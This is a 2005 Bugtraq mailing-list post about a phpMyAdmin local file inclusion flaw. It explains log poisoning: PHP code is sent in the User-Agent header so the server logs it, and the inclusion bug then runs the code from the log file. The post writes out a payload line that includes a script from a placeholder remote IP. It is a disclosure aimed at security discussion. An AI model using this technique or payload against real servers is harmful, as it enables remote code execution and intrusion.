Re: [SECURITYREASON.COM] phpMyAdmin Local file inclusion 2.6.4-pl1

From: Andreas Zeidler (az_at_zitc.de)
Date: 10/12/05

  • Next message: lgreenem_at_cmp.com: "Research for network security news article" 
    Date: Wed, 12 Oct 2005 21:23:37 +0200
To: Bugtraq <bugtraq@securityfocus.com>

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    On Mon, Oct 10 16:11, Maksymilian Arciemowicz <max@jestsuper.pl> wrote:
    > - --- 0.Description ---
    > phpMyAdmin 2.6.4 is a tool written in PHP intended to
    > handle the administration of MySQL over the Web.
    > [...]
    > phpMyAdmin is very dangerous script.
    >
    > - --- 1. Local file inclusion (Critical) ---
    > File: ./libraries/grab_globals.lib.php

    hi again,

    since my post yesterday apparently had some trouble being delivered
    because of a "suspicious attachment" (my pgp sig :)) i thought i'd
    send it again. and this time even as a reply to the right message... :)

    in case you already got this, sorry for bothering twice,

    andi

    - ----- quote on ---------------------------------------------------------
    this is a comment on the recent phpmyadmin vulnerability[1] discovered
    by maksymilian arciemowicz. i didn't really know where to post this,
    so i hope this is the right place.

    anyway, since i've used a file inclusion vulnerability in an older
    version of phpmyadmin as a starting point for a security analysis last
    weekend, and came up with a rather simple idea of how to use it for
    unprivileged script execution of remote php code, i thought i'd post
    this here. actually i think this method could be used on any php-based
    local include vuln, so i was wondering why i couldn't yet find anything
    about it on the net...

    okay, the problem with local file vulns is of course, that the contents
    of the file being read are not evaluated. but given php's include
    statement the are -- if they contain a valid php statement. now instead
    of trying to upload a file containing php code (which wasn't possible in
    my case), i ask myself if there was a way to use the server to create it
    for me?

    the idea that hit me before falling asleep was to send the code i needed
    (like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the user
    agent string, this way having the web server write it into a file for
    me, and in a second step simply use the already existent local file vuln
    to read and the server's log file and this way execute the code.

    of course this method doesn't always work. php mustn't run in safe
    mode, the web server has to log user agent strings and the log files
    must be accessible after privileges have been dropped. since most
    people are logging in combined format, i guess the last requirement is
    the most critical one, but many logs are world-readable nevertheless.
    also, enabled url-based includes make things easier, but they're not
    stricly necessary.

    so, provided with a php local file vuln and readable log files,
    executing arbitrary commands comes down to locating a suitable log file
    to include. with a little guessing and the ability to read files (i.e.
    the server configuration) this is not too difficult.

    that's it. any comments and feedback about this is most welcome,
    especially since this approach seems much too simple to not having been
    used before. maybe someone can just point me to an already existing
    discussion about this... :)

    [1] http://www.securityfocus.com/bid/15053
    - ----- quote off --------------------------------------------------------

    - --
    zeidler it consulting - http://zitc.de/ - info@zitc.de
    karl-kunger-str 59 - 12435 berlin - telefon +49 30 25563779
    keine softwarepatente in europa! - http://noepatents.eu.org/
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.1 (GNU/Linux)

    iD8DBQFDTWK5V41LSDEbSrkRArkyAKCMW/Wg9XZ5BErRujvN5sjhXVeTfgCgl/Sx
    CUrBPEZ35UWqjxofn9Pj9hQ=
    =qJYs
    -----END PGP SIGNATURE-----

  • Next message: lgreenem_at_cmp.com: "Research for network security news article"
    • Quantcast